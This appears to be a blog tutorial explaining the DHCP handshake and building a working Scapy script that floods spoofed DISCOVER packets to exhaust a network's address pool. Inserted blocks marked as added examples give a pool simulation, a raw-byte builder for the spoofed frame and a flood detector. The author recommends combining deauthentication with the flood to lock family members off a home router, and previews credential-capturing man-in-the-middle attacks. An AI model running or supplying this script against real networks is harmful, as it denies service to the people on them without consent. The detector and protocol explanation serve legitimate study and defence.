DHCP Starvation Attack using Python

Kavishka Gihan
6 min read · Aug 13, 2021


In this article, I am going to talk about what a DHCP starvation attack is and how this attack can be done using Python.

If you do not know what DHCP is or what the protocol is used for, I recommend reading the article below to get a basic understanding of how all of this works.

Before we talk about how this attack is done, we need a thorough understanding of how IP address assignment works.

IP address allocation process

Whenever a new device joins a network, the DHCP server automatically assigns it an IP address.

Here you can see that four packets are exchanged between the client and the DHCP server in this process (often abbreviated DORA: Discover, Offer, Request, Acknowledge). Let's go through them one by one.

1. DHCP-DISCOVER is sent by the client to find DHCP servers. It is the first packet of the conversation and asks for an IP address. Because the client has no address yet and does not know where the server is, the packet is broadcast on the local network (source 0.0.0.0, destination 255.255.255.255). Every DHCP server that receives it responds accordingly.
DISCOVER packet sent to DHCP servers

2. DHCP-OFFER is the server's reply to the DISCOVER. It proposes an IP address together with lease parameters (subnet mask, lease time and so on) and is normally unicast to the client hardware address carried in the DISCOVER; if the client set the broadcast flag, the server broadcasts it instead. If the server has no free address left in its pool, it does not send a denial: it simply does not answer, and the client keeps waiting and retrying.

3. DHCP-REQUEST is sent by the client once it has received at least one OFFER. If it receives several offers it typically accepts the first one, and it broadcasts the REQUEST (naming the chosen server and the offered address) to formally claim the address and to let the other servers know their offers were declined.

DHCP server responded with the IP 192.168.1.3

4. DHCP-ACK or DHCP-NAK is the server's final answer. An ACK confirms that the address has been leased to the client; a NAK refuses the request (for example because the address is no longer available), and the client starts over with a new DISCOVER. If the client later finds that the address is already in use (usually by probing it with ARP), it sends a DHCP-DECLINE to the server and begins the process again.

After this exchange, the client holds a lease and is connected to the network with a valid IP address.

What are we exploiting?

Now you might be thinking: what is there to exploit? This is just a simple process. Well, yes, it is. But we are targeting the fact that the DHCP server hands out an address to any host that asks for one, and the only thing that identifies that host is the hardware address it claims in its own packet.

Imagine a scenario like this. You, the attacker, connect to a network and are automatically assigned an IP address by its DHCP server. Then you ask the server for another address by sending a crafted DISCOVER that carries a different client hardware address (chaddr). The server has no way of knowing that this MAC does not belong to a real device, so it takes an address out of the pool and reserves it for that MAC. One caveat worth knowing in practice: an address that was only offered, and never confirmed with a REQUEST, is held for a limited time (how long depends on the server) before it returns to the pool. That is why a DISCOVER-only flood has to keep running to stay effective, and why a more thorough variant also completes the REQUEST step so the addresses are actually leased.

“If we send spoofed packets requesting IP addresses until every address in the DHCP pool is allocated, no other client will be able to join the network, because there are no addresses left. This is what we call a DHCP starvation attack.”
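To make the pool-exhaustion mechanics concrete, here is a small model of the server side, written for this article as an added example (it is not the author's code and not any real DHCP server's implementation). It tracks addresses as free, offered or leased, assumes a made-up pool of thirteen addresses and a made-up offer hold time, and runs two scenarios: the DISCOVER-only flood that this article's script performs, and a flood that completes the handshake with REQUEST. The comparison shows the caveat above: addresses that were offered but never requested come back once the server's hold timer lapses, leased ones do not.

```python
"""Toy model of a DHCP server's address pool, showing why spoofed DISCOVERs exhaust it.

Added example, not from the article. Pool size, offer hold time and lease time are
made-up parameters; real servers differ in how long they reserve an offered address.
"""
from dataclasses import dataclass, field
import ipaddress
import os


@dataclass
class PoolServer:
    """Addresses move free -> offered (on DISCOVER) -> leased (on REQUEST) and back on expiry."""
    free: list
    offer_hold: float = 120.0      # seconds an OFFER stays reserved with no REQUEST (assumed)
    lease_time: float = 3600.0     # seconds a lease lasts once ACKed (assumed)
    offered: dict = field(default_factory=dict)   # chaddr -> (ip, expiry)
    leased: dict = field(default_factory=dict)    # chaddr -> (ip, expiry)

    def _expire(self, now: float) -> None:
        for table in (self.offered, self.leased):
            for mac, (ip, expiry) in list(table.items()):
                if expiry <= now:
                    del table[mac]
                    self.free.append(ip)

    def discover(self, chaddr: bytes, now: float):
        """Return the IP the server would OFFER, or None when nothing is left (server stays silent)."""
        self._expire(now)
        for table in (self.leased, self.offered):
            if chaddr in table:            # known client: re-offer its current address
                return table[chaddr][0]
        if not self.free:
            return None
        ip = self.free.pop(0)
        self.offered[chaddr] = (ip, now + self.offer_hold)
        return ip

    def request(self, chaddr: bytes, now: float):
        """REQUEST after an OFFER: the reservation becomes a lease (ACK); otherwise NAK (None)."""
        self._expire(now)
        if chaddr not in self.offered:
            return None
        ip, _ = self.offered.pop(chaddr)
        self.leased[chaddr] = (ip, now + self.lease_time)
        return ip


def make_pool(cidr: str = "192.168.1.0/28", first: int = 2, last: int = 14) -> list:
    """Constructed pool: 192.168.1.2 .. 192.168.1.14, thirteen addresses."""
    net = ipaddress.ip_network(cidr)
    return [str(net.network_address + i) for i in range(first, last + 1)]


def starve(server: PoolServer, count: int, now: float, complete: bool = False) -> int:
    """Send `count` DISCOVERs, each from a fresh random chaddr; optionally REQUEST as well.
    Returns how many of them were offered an address."""
    offers = 0
    for _ in range(count):
        mac = os.urandom(6)                      # spoofed client hardware address
        if server.discover(mac, now) is not None:
            offers += 1
            if complete:
                server.request(mac, now)
    return offers


def demo() -> dict:
    pool = make_pool()
    victim = bytes.fromhex("aabbccddeeff")       # a legitimate client joining later

    # Scenario 1: DISCOVER-only flood, like the script in this article.
    srv = PoolServer(free=list(pool))
    taken = starve(srv, 100, now=0.0)
    during = srv.discover(victim, now=10.0)                  # pool exhausted: no OFFER
    after = srv.discover(victim, now=srv.offer_hold + 1)     # offers lapsed, pool refilled

    # Scenario 2: the flood also sends REQUEST, so addresses are leased, not just offered.
    srv2 = PoolServer(free=list(pool))
    starve(srv2, 100, now=0.0, complete=True)
    after_full = srv2.discover(victim, now=srv2.offer_hold + 1)   # still nothing

    return {"offers_taken": taken, "victim_during_attack": during,
            "victim_after_offers_expire": after, "victim_after_full_handshake": after_full}


if __name__ == "__main__":
    print(demo())
```

Run it directly to print the result dict. The hold time is the knob to watch when testing against a real server: a short hold timer means a DISCOVER-only flood has to keep running to stay effective, which is exactly why the script later in this article is left running in a loop.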

Don’t be a Script Kiddie

There are a lot of automated tools that perform this attack in one or two clicks. But as a good hacker you should understand what happens under the hood, so let's build our own script to perform this attack.

For this I am using the Scapy module for Python. You can get the full source code from my GitHub.

from scapy.all import *
conf.checkIPaddr = False

First I import the Scapy module. Then I disable Scapy's IP address check (conf.checkIPaddr). By default, when Scapy matches replies to the packets it sent, it requires the reply's source IP to equal the request's destination IP; a DHCP OFFER comes from the server's own address rather than from 255.255.255.255, so with the check enabled Scapy would discard it. This matters if you extend the script to read the server's answers with sr1(); for a send-only flood like this one it is harmless.

ether = Ether(dst="ff:ff:ff:ff:ff:ff", src=RandMAC(), type=0x0800)

Secondly, I build the DISCOVER packet to send. The first layer is the Ethernet layer, the bottom-most one. Here I set the destination address (dst) to ff:ff:ff:ff:ff:ff, because the frame has to be broadcast, and, to stop the DHCP server from learning who the real sender is, I set the source address (src) to a random MAC with the RandMAC() function.

Note the type field: 0x0800 is the EtherType for IPv4, and you can see the same value in a real DISCOVER frame. Scapy would fill it in automatically when an IP layer is stacked on top, but setting it explicitly makes the intent clear and guarantees the frame is valid.

Wireshark capture of a DISCOVER packet

ip = IP(src="0.0.0.0", dst="255.255.255.255")
udp = UDP(dport=67, sport=68)

Then I add the IP layer with source 0.0.0.0 (the client has no address yet) and destination 255.255.255.255 (the limited broadcast address). After that comes the UDP layer, which sets the ports: 67 is the DHCP/BOOTP server port, so the destination port is 67, and 68 is the client port, so the source port is 68.

bootp = BOOTP(op=1, chaddr=RandMAC())
dhcp = DHCP(options=[("message-type", "discover"), "end"])

After that comes the BOOTP header. op=1 marks the message as a BOOTREQUEST (client to server), and chaddr is the client hardware address that the server keys the lease on, so it is set to a random MAC as well. Note that this RandMAC() is evaluated independently of the one in the Ether layer, so the frame's source MAC and the chaddr will not match; switches running DHCP snooping with MAC address verification drop such frames on untrusted ports, so if that matters in your environment, generate one MAC and use it in both places. Finally I add the DHCP layer and set the message-type option to discover, followed by the end option.

DHCP_DISCOVER = ether / ip / udp / bootp / dhcp
sendp(DHCP_DISCOVER, iface="eth0", loop=1, verbose=1)

Lastly, I stack the layers into one packet and send it at layer 2 with sendp(). loop=1 makes Scapy rebuild and resend the packet until you stop it with Ctrl-C, and because RandMAC() is re-evaluated on every build, each copy carries a fresh MAC and therefore looks like a new client asking for an address. iface selects the interface to send on, here eth0.
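For readers who want to see the bytes behind those layers, the following is an added example and not part of the article's script: it builds the same DISCOVER frame with nothing but the Python standard library, mirroring each Scapy layer above, and decodes it back so you can check the fields against a Wireshark capture. The MAC and xid values are made up, the IP checksum is computed by hand because Scapy normally does that for you, and the parser also reports whether the Ethernet source MAC matches chaddr, the consistency check that DHCP snooping enforces.

```python
"""Build the DHCP DISCOVER frame from the article by hand and decode it back.

Added example, not the article's Scapy script: each function mirrors one Scapy layer
above so you can see the exact bytes it emits. MAC and xid values are made up.
"""
import os
import struct

ETH_BROADCAST = b"\xff" * 6
ETHERTYPE_IPV4 = 0x0800             # Ether(type=0x0800)
DHCP_MAGIC = b"\x63\x82\x53\x63"    # RFC 2131 options magic cookie
BOOTREQUEST = 1                     # BOOTP(op=1)
OPT_MSG_TYPE, OPT_CLIENT_ID, OPT_END = 53, 61, 255
DHCPDISCOVER = 1                    # value of option 53 for "discover"


def random_mac() -> bytes:
    """Random unicast, locally administered MAC (roughly what Scapy's RandMAC() yields)."""
    b = bytearray(os.urandom(6))
    b[0] = (b[0] | 0x02) & 0xFE     # set the local bit, clear the multicast bit
    return bytes(b)


def build_bootp_discover(mac: bytes, xid: int) -> bytes:
    """BOOTP(op=1, chaddr=mac) / DHCP(options=[("message-type", "discover"), "end"]) as bytes."""
    if len(mac) != 6:
        raise ValueError("expected a 6-byte MAC")
    header = struct.pack(
        "!BBBBIHH4s4s4s4s16s64s128s",
        BOOTREQUEST, 1, 6, 0,                         # op, htype=1 (Ethernet), hlen=6, hops
        xid, 0, 0,                                    # xid, secs, flags (0x8000 would request a broadcast OFFER)
        b"\0" * 4, b"\0" * 4, b"\0" * 4, b"\0" * 4,   # ciaddr, yiaddr, siaddr, giaddr
        mac.ljust(16, b"\0"), b"\0" * 64, b"\0" * 128)  # chaddr (padded to 16), sname, file
    options = (bytes([OPT_MSG_TYPE, 1, DHCPDISCOVER])
               + bytes([OPT_CLIENT_ID, 7, 1]) + mac   # client-id = htype byte + MAC
               + bytes([OPT_END]))
    return header + DHCP_MAGIC + options


def ip_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum; Scapy fills this in for you."""
    if len(data) % 2:
        data += b"\0"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def frame_discover(src_mac: bytes, bootp: bytes) -> bytes:
    """Ether(dst=broadcast, src=src_mac, type=0x0800) / IP(0.0.0.0 -> 255.255.255.255) / UDP(68 -> 67)."""
    udp = struct.pack("!HHHH", 68, 67, 8 + len(bootp), 0) + bootp   # checksum 0 = omitted (legal over IPv4)
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 64, 17, 0,
                         b"\0" * 4, b"\xff" * 4)                     # ver/ihl, tos, len, id, frag, ttl, proto=UDP
    ip_hdr = ip_hdr[:10] + struct.pack("!H", ip_checksum(ip_hdr)) + ip_hdr[12:]
    return ETH_BROADCAST + src_mac + struct.pack("!H", ETHERTYPE_IPV4) + ip_hdr + udp


def parse_discover_frame(frame: bytes) -> dict:
    """Decode the fields discussed in the text and flag whether Ethernet src and chaddr agree."""
    eth_dst, eth_src = frame[:6], frame[6:12]
    eth_type = struct.unpack("!H", frame[12:14])[0]
    ip = frame[14:]
    udp = ip[(ip[0] & 0x0F) * 4:]                 # skip the IP header (IHL words)
    sport, dport = struct.unpack("!HH", udp[:4])
    bootp = udp[8:]
    op, htype, hlen, _hops, xid, _secs, flags = struct.unpack("!BBBBIHH", bootp[:12])
    if bootp[236:240] != DHCP_MAGIC:
        raise ValueError("not a DHCP message")
    chaddr = bootp[28:28 + hlen]
    options, i = {}, 240
    while i < len(bootp) and bootp[i] != OPT_END:
        if bootp[i] == 0:                         # pad option
            i += 1
            continue
        code, length = bootp[i], bootp[i + 1]
        options[code] = bootp[i + 2:i + 2 + length]
        i += 2 + length
    return {"eth_dst": eth_dst, "eth_src": eth_src, "eth_type": eth_type,
            "proto": ip[9], "src_ip": ip[12:16], "dst_ip": ip[16:20],
            "sport": sport, "dport": dport, "op": op, "htype": htype, "hlen": hlen,
            "xid": xid, "flags": flags, "chaddr": chaddr, "options": options,
            "mac_consistent": eth_src == chaddr}


def spoofed_discover(mac=None, xid=None) -> bytes:
    """One attacker frame with a fresh MAC used consistently in Ether.src and chaddr."""
    mac = mac or random_mac()
    xid = int.from_bytes(os.urandom(4), "big") if xid is None else xid
    return frame_discover(mac, build_bootp_discover(mac, xid))


if __name__ == "__main__":
    d = parse_discover_frame(spoofed_discover())
    print("chaddr", d["chaddr"].hex(":"), "type 0x%04x" % d["eth_type"],
          "udp %d->%d" % (d["sport"], d["dport"]), "msg-type", d["options"][53].hex(),
          "mac match", d["mac_consistent"])
```

Feeding the output of spoofed_discover() to a raw socket would reproduce the article's attack without Scapy, but the point here is the other direction: parse_discover_frame() shows the handful of fields a server or a snooping switch actually gets to see, and that the only client identity in the message is whatever the sender chose to write into chaddr.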

Then you can run the script. Make sure to run it as root (or with the CAP_NET_RAW capability), since Scapy needs a raw socket to send frames at layer 2.

As you can see, a steady stream of packets is being sent. We can capture these DISCOVER packets in Wireshark as well.

Let the script run for one to three minutes. By then every address in the DHCP pool should be allocated. If a client now tries to connect to the network, it will not receive an IP address, and so it will not be able to use the network.

In my case, my Android device kept waiting to receive an IP address. But since the DHCP pool was already exhausted, it was not able to connect.
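The flip side of the attack is how a defender notices it. The following is an added detection example, not from the article: it runs a sliding window over (time, chaddr) records of DISCOVER messages and alerts when more distinct client MACs appear within ten seconds than a segment of that size could plausibly produce. The records are constructed for the demo (five ordinary clients over a minute, then sixty spoofed MACs in three seconds), and the threshold is an assumption to tune for your own network.

```python
"""Spot a DHCP DISCOVER flood by counting distinct client MACs in a sliding window.

Added example, not from the article. The record tuples are constructed for the demo
(seconds since capture start, client hardware address); they are not a real log format.
"""
from collections import deque


def constructed_records() -> list:
    """Five legitimate clients over the first minute, then 60 spoofed MACs in three seconds."""
    recs = [(12.0 * i, "aa:bb:cc:00:00:%02x" % i) for i in range(5)]
    recs += [(60.0 + i / 20, "02:00:00:00:%02x:%02x" % (i // 256, i % 256)) for i in range(60)]
    return recs


def detect_starvation(records, window: float = 10.0, max_clients: int = 15) -> list:
    """Sliding window over DISCOVER records ordered by time.

    Alert when the number of distinct chaddr values seen in the last `window` seconds
    first exceeds `max_clients` (an assumed threshold); re-arm only once the count has
    dropped back to or below it. Returns [(time, distinct_count), ...].
    """
    recent = deque()                 # (time, chaddr) pairs inside the window
    alerts, above = [], False
    for t, chaddr in sorted(records):
        recent.append((t, chaddr))
        while recent and recent[0][0] < t - window:
            recent.popleft()
        distinct = len({m for _, m in recent})
        if distinct > max_clients and not above:
            alerts.append((t, distinct))
            above = True
        elif distinct <= max_clients:
            above = False
    return alerts


if __name__ == "__main__":
    for when, count in detect_starvation(constructed_records()):
        print("possible DHCP starvation at t=%.2fs: %d distinct client MACs in 10s" % (when, count))
```

The same idea is what switch-side DHCP snooping rate limits and port-security MAC limits enforce: a single access port should not originate dozens of new client MACs per second, so capping that rate stops the flood before it reaches the server, whereas the detector above only tells you after the fact which port or capture point it came from.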

A life hack, beyond the topic

So now you have seen how powerful this attack can be and what kind of damage it can do to a network. But you can make it more interesting and fun.

From experience I know how annoying it is when someone is using all the bandwidth of your home router so you can't do your online stuff. So what you can do is this: run a deauthentication attack against the network, excluding your own device's MAC address, and then run this attack so that no one can connect back. (Don't attack networks that you don't have permission to.)

This is a little trick I used to keep my family members away from my router. :laughing:

In an upcoming article, I will demonstrate how you can leverage this into a man-in-the-middle attack so that you can capture all the traffic going around the network, and maybe some credentials too.

“So that’s it for now folks, if you have any questions, make sure to leave them down in the comments or contact me through social media.”

Email — iamkavigihan@gmail.com
Instagram — https://www.instagram.com/_kavi.gihan/

Happy Hacking !!! 😃

Written by Kavishka Gihan

Cyber Security Student | Machine author @hackthebox | find me on instagram @_kavi.gihan
